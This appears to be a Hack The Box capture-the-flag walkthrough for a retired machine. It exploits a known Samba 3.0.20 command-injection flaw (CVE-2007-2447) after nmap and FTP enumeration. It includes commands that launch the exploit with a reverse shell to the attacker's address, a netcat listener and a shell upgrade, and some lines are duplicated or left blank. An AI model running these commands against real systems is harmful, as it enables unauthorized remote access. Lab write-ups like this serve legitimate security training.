This machine is very easy and straight forward using public exploit and then you get root access directly. These machine from retired machines on hackthebox and you need a vip subscribtion to access them. enjoy..
1. Enumeration:
- Nmap scan:
nmap -sC -sV 10.10.10.3 -Pnorsudo nmap -sV -O -F --version-light 10.10.10.3
now we know the open ports and running services on them:
- 21 » ftp
- 22 » ssh
- 139 » samba
- 445 » samba
FTP Enumeration:
- let’s try loging into ftp using anonymous and empty password just press enter.
- login successful but i found nothing in there.
searching for samba exploits locally:
searchsploit samba 3.0.20
found exploit for this version of samba that leads to RCE
let’s look at it and know it’s cve number to get it online and not using it with metasploit.
nano /usr/share/exploitdb/exploits/unix/remote/16320.rb
- cve number » 2007-2447
- let’s search it in google
found this github python exploit:
- let’s search it in google
found this github python exploit:
let’s install it and its dependencies:
-
usage:
-
Exploitation:
-
python3 usermap_script.py 10.10.10.3 445 10.10.16.157 9001 -
open netcat on port 9001:
-
nc -lvnp 9001
//getting responsive shell:
python -c 'import pty; pty.spawn("/bin/sh")'
id
//getting root flag:
cd /root
cat root.txt
find /home user.txt
cat /home/makis/user.txt
- getting user flag:
find /home user.txt
cat /home/makis/user.txt
And that’s it, hope you enjoyed..
if so kindly give me respect Wh1rlw1nd-HTB.